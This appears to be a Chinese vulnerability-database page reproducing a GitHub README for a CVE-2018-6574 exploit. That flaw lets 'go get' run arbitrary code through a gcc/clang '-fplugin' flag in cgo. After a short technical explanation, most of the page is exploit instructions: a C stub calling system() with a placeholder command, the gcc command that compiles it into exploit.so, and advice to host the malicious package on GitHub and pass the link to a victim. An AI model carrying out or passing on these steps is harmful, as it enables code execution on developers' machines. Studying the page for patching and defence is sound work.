来源

关联漏洞

描述

Exploit for remote command execution in Golang go get command.

介绍

# CVE-2018-6574
Exploit for remote command execution in Golang `go get` command.

## Introduction

When you go get a package, Go is designed to build and install the package without running any code from it. The intent is that you can safely get, build, and even install Go packages without trusting them at all. In theory, it seems like this should be a simple feat for the Go toolchain, but in actuality, it's a real challenge. go get does a lot under the hood, including invoking third-party tools like git and clang in ways that are heavily influenced by package configurations. Ensuring that these invocations are safe is an uphill battle that Go hasn't quite won yet.

When cgo is enabled, the build step during “go get” invokes the host C compiler, gcc or clang, adding compiler flags specified in the Go source files. Both gcc and clang support a plugin mechanism in which a shared-library plugin is loaded into the compiler, as directed by compiler flags. This means that a Go package repository can contain an exploit.so file along with a Go source file that says (for example) // #cgo CFLAGS: -fplugin=exploit.so, causing the attack plugin to be loaded into the host C compiler during the build. Gcc and clang plugins are completely unrestricted in their access to the host system.

Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow `go get` remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before.

## Building the Exploit

For Exploit we will need to host our malicious package. We need a website with TLS and a valid certificate chain. An easy way to do this is to use [github](https://github.com)

Then, you will need a malicious plugin/.so file. The code in [exploit.c](https://github.com/Devang-Solanki/CVE-2018-6574/blob/main/exploit.c) should help you with that. 

**Note: Change this following code in [exploit.c](https://github.com/Devang-Solanki/CVE-2018-6574/blob/main/exploit.c) to your command**
```c
void exploit() {
    system("<Your CMD>");
}
```
**Note: Compile this file according to your victim's machine/pc architecture**

You can build exploit.sp it using the following command:
```console
gcc -shared -o exploit.so -fPIC exploit.c
```

Once you host your full payload on Github, you should be able to pass the package link to the victim. 

文件快照

 [4.0K]  /data/pocs/9bd0065b5df440cf09438c96ed4d4bcdbd6a59d5
├── [ 136]  exploit.c
├── [1.2K]  LICENSE
├── [ 277]  main.go
└── [2.4K]  README.md

0 directories, 4 files

备注